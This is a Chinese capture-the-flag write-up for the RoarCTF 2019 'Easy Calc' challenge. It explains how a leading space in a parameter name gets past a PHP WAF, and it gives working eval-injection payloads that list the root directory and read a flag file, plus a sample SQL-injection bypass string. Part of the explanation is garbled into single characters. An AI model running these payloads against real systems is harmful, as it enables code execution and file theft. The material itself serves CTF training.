[RoarCTF 2019]Easy Calc
一.首先打开题目发现一个“计算器”,随便输入后发现没什么用
然后查看源码:
发现有waf:
`
$('#calc').submit(function(){
$.ajax({
url:"calc.php?num="+encodeURIComponent($("#content").val()),
type:'GET',
success:function(data){
$("#result").html(`<div class="alert alert-success">
<strong>答案:</strong>${data}
</div>`);
},
error:function(){
alert("这啥?算不来!");
}
})
return false;
})`
注意到这一句:url:“calc.php?num=”+encodeURIComponent($("#content").val()),就访问一下calc.php:
可以看出黑名单过滤了一些字符
补充知识点:
scandir()函数:返回指定目录中的文件和目录的数组
扫根目录下的所有文件,也就是是scandir("/")
var_dump():输出变量的相关信息
chr() — 返回指定的字符
file_get_contents() — 将整个文件读入一个字符串
这是别人对PHP字符串解析漏洞的理解,
我们知道PHP将查询字符串(在URL或正文中)转换为内部
G
E
T
或
的
关
联
数
组
_GET或的关联数组
G?ET或的关联数组_POST。例如:/?foo=bar变成Array([foo] => “bar”)。值得注意的是,查询字符串在解析的过程中会将某些字符删除或用下划线代替。例如,/?%20news[id%00=42会转换为Array([news_id] => 42)。如果一个IDS/IPS或WAF中有一条规则是当news_id参数的值是一个非数字的值则拦截,那么我们就可以用以下语句绕过:
/news.php?%20news[id%00=42"+AND+1=0–
上述PHP语句的参数%20news[id%00的值将存储到$_GET[“news_id”]中。
HP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事:
1.删除空白符
2.将某些字符转换为下划线(包括空格)
二.接下来就自己尝试写payload:
首先 通过 chr(‘’) scandir() 搜寻目录(列出 参数目录 中的文件和目录,要不然我们怎么知道flag在哪)
输入 num(num前有一个空格,如果num前无空格,则返回一下forbidden,这个应该就是waf了,利用PHP的字符串解析特性就能够进行绕过waf)
由于scandir("/")扫描根目录时,过滤了"/",就用ASCII绕过,即
http://node4.buuoj.cn:26415/calc.php?%20num=a;var_dump(scandir(chr(47)))
得到
可以发现有f1agg,这里需要注意的是数字1,而非字母l
打印该文件var_dump(file_get_contents(chr(102).chr(49).chr(97).chr(103).chr(103)))等价于
var_dump(file_get_contents(“flagg”)),但返回bool(false),原来是路径问题 添加 /,
var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))),
得到flag:astring(43) "flag{3c6f0607-f4c3-44a9-ad52-6c3f8b4edeba} "
